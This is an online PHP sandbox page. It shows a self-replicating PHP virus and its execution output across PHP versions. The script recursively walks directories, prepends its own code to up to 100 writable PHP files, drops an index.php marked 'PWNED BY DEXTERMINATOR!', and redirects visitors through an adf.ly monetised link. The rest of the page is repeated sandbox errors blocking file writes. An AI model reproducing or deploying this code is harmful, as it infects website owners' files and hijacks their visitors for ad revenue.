3v4l.org

run code in 300+ PHP versions simultaneously
<?php #index.php $atefile = 0; $adlink= "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; walkthrough('../..'); function walkthrough($dir) { global $atefile; $maxi = 100; $viruscontents=fread(fopen(__FILE__,'r'), 1644); if (!file_exists('index.php')) { $handle = fopen('index.php', 'a'); fwrite($handle, $viruscontents.'PWNED BY DEXTERMINATOR!'); fclose($handle); } if(is_dir($dir)){ if($dh = opendir($dir)){ while(($file = readdir($dh)) !== false && $atefile<$maxi){ if($file != "." && $file != ".."){ if(is_dir($dir."/".$file)){ walkthrough($dir."/".$file); }else{ if(strstr (substr($file, -4), 'php')){ $infected=true; $caniwrite=false; if ( is_file($dir."/".$file) && is_writeable($dir."/".$file) ){ $output = fopen($dir."/".$file, "r"); if(filesize ($dir."/".$file)>0){ $contents = fread ($output , 20); $mine = strstr ($contents, 'index.php'); fclose($output ); } $infected=false; if($mine){$infected=true;} } if($infected==false){ if(filesize ($dir."/".$file)>0){ $victim = fopen($dir."/".$file, "r+"); $ori = fread($victim, filesize($dir."/".$file)); fclose($victim); } $victim = fopen($dir."/".$file, "w+"); if(filesize($dir."/".$file)==0){ fwrite($victim, $viruscontents); }else{ fputs($victim ,$viruscontents.$ori); } $atefile++; fclose($victim ); } } } } } closedir($dh); } } return $counter; } header ('Location: http://adf.ly/7520520/' . $adlink); ?>
Output for 8.3.0 - 8.3.6
Warning: Undefined array key "HTTP_HOST" in /in/q7qZT on line 3 Warning: Undefined array key "REQUEST_URI" in /in/q7qZT on line 3 Warning: file_exists(): open_basedir restriction in effect. File(index.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/q7qZT on line 9 Warning: fopen(): open_basedir restriction in effect. File(index.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/q7qZT on line 10 Warning: fopen(index.php): Failed to open stream: Operation not permitted in /in/q7qZT on line 10 Fatal error: Uncaught TypeError: fwrite(): Argument #1 ($stream) must be of type resource, false given in /in/q7qZT:11 Stack trace: #0 /in/q7qZT(11): fwrite(false, '<?php #index.ph...') #1 /in/q7qZT(4): walkthrough('../..') #2 {main} thrown in /in/q7qZT on line 11
Process exited with code 255.
Output for 8.1.24 - 8.1.28, 8.2.11 - 8.2.18
Warning: Undefined array key "HTTP_HOST" in /in/q7qZT on line 3 Warning: Undefined array key "REQUEST_URI" in /in/q7qZT on line 3 Warning: file_exists(): open_basedir restriction in effect. File(index.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/q7qZT on line 9 Warning: fopen(): open_basedir restriction in effect. File(index.php) is not within the allowed path(s): (/tmp:/in:/etc) in /in/q7qZT on line 10 Warning: fopen(index.php): Failed to open stream: Operation not permitted in /in/q7qZT on line 10 Fatal error: Uncaught TypeError: fwrite(): Argument #1 ($stream) must be of type resource, bool given in /in/q7qZT:11 Stack trace: #0 /in/q7qZT(11): fwrite(false, '<?php #index.ph...') #1 /in/q7qZT(4): walkthrough('../..') #2 {main} thrown in /in/q7qZT on line 11
Process exited with code 255.
Output for 8.0.0 - 8.0.12
Warning: Undefined array key "HTTP_HOST" in /in/q7qZT on line 3 Warning: Undefined array key "REQUEST_URI" in /in/q7qZT on line 3 Warning: fopen(index.php): Failed to open stream: Read-only file system in /in/q7qZT on line 10 Fatal error: Uncaught TypeError: fwrite(): Argument #1 ($stream) must be of type resource, bool given in /in/q7qZT:11 Stack trace: #0 /in/q7qZT(11): fwrite(false, '<?php #index.ph...') #1 /in/q7qZT(4): walkthrough('../..') #2 {main} thrown in /in/q7qZT on line 11
Process exited with code 255.
Output for 7.3.0 - 7.3.32, 7.4.0 - 7.4.25
Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: opendir(../../var/run/systemd/incoming): failed to open dir: Permission denied in /in/q7qZT on line 15 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: opendir(../../dev/fd/3/var/run/systemd/incoming): failed to open dir: Permission denied in /in/q7qZT on line 15 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: opendir(../../dev/fd/3/dev/fd/3/var/run/systemd/incoming): failed to open dir: Permission denied in /in/q7qZT on line 15 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: opendir(../../dev/fd/3/dev/fd/3/dev/fd/3/var/run/systemd/incoming): failed to open dir: Permission denied in /in/q7qZT on line 15 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 Warning: fwrite() expects parameter 1 to be resource, bool given in /in/q7qZT on line 11 Warning: fclose() expects parameter 1 to be resource, bool given in /in/q7qZT on line 12 Warning: fopen(index.php): failed to open stream: Read-only file system in /in/q7qZT on line 10 